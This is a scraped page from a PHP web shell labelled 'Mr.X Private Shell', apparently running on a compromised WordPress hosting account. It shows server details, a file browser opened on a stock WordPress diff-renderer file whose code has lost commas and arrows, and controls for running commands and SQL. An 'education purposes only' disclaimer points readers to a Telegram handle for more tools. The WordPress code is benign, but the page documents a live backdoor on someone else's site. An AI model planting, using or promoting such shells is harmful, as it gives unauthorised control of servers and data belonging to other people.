Uname: Linux premium294.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: 768 (artoqlkw)
Group: 773 (artoqlkw)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/artoqlkw/infoindobola.net/wp-includes      ( Reset | Go to )
File Name: class-wp-text-diff-renderer-inline.php
Edit
<?php
/**
 * Diff API: WP_Text_Diff_Renderer_inline class
 *
 * @package WordPress
 * @subpackage Diff
 * @since 4.7.0
 */

/**
 * Better word splitting than the PEAR package provides.
 *
 * @since 2.6.0
 * @uses Text_Diff_Renderer_inline Extends
 */
#[AllowDynamicProperties]
class 
WP_Text_Diff_Renderer_inline extends Text_Diff_Renderer_inline {

    
/**
     * @ignore
     * @since 2.6.0
     *
     * @param string $string
     * @param string $newlineEscape
     * @return string
     */
    
public function _splitOnWords$string$newlineEscape "\n" ) { // phpcs:ignore Universal.NamingConventions.NoReservedKeywordParameterNames.stringFound,WordPress.NamingConventions.ValidVariableName.VariableNotSnakeCase
        
$string str_replace"\0"''$string );
        
$words  preg_split'/([^\w])/u'$string, -1PREG_SPLIT_DELIM_CAPTURE );
        
$words  str_replace"\n"$newlineEscape$words ); // phpcs:ignore WordPress.NamingConventions.ValidVariableName.VariableNotSnakeCase
        
return $words;
    }
}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL